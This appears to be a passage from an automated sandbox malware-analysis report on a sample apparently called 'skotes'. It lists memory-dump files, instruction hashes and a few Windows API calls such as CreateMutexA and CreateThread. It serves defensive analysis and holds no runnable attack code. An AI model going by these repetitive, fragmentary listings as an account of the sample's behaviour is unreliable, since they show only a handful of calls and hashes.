                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 396266464-0
                                                                                                                                                                                                                                              • Opcode ID: 97f1ba718f609765fc855e51c4d1a053dc310a2e073b7504fc0fbc771b7b7e0e
                                                                                                                                                                                                                                              • Instruction ID: daacd0f1a9ec2bc501ceb96f244ac20afad9516f65fc1a2ea0d1690cb094b252
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97f1ba718f609765fc855e51c4d1a053dc310a2e073b7504fc0fbc771b7b7e0e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D3159317002448BEB08DB78DDC976DF7F2DB85310F24829AE014D73E1E7B999808766
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00BDA7BA
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 396266464-0
                                                                                                                                                                                                                                              • Opcode ID: 5421a8e38ad1ac5255991cc18c026473c35f70eadc444304e0876ec660c9a3e1
                                                                                                                                                                                                                                              • Instruction ID: cb6b4eec811ea29730eb679aafdd72f018e77377b9f3b6845b0cd3a479e05bb6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5421a8e38ad1ac5255991cc18c026473c35f70eadc444304e0876ec660c9a3e1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED315931B001448BEB08DB78DDC9B6DF7F6EB85310F20829AE414E73D1E77A99818726
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3d6712192b493d4063bbbfce442e94c972cfdc20416b0b630238661e83936079
                                                                                                                                                                                                                                              • Instruction ID: 678b0871172118fad7b710c12aac6e47153c98b7843f1714dfbd52df8160240d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d6712192b493d4063bbbfce442e94c972cfdc20416b0b630238661e83936079
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4721D6729052196AEB117FA8EC42B9F3729DF41378F100315F9342B1D2D7709E11E661
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 5d99646ae09323424cf7fca8d278462832b64b284be8d6f83e24972ac00c7b48
                                                                                                                                                                                                                                              • Instruction ID: be5c5934e00337922eeebe83e4b616ca70ad743210be9825778e694df915eb28
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d99646ae09323424cf7fca8d278462832b64b284be8d6f83e24972ac00c7b48
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3E0CD223A930496FA147769B85DB3EE2E4C7D5F41F210416F604C71E1A6B5C5C48137
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00BE6D11
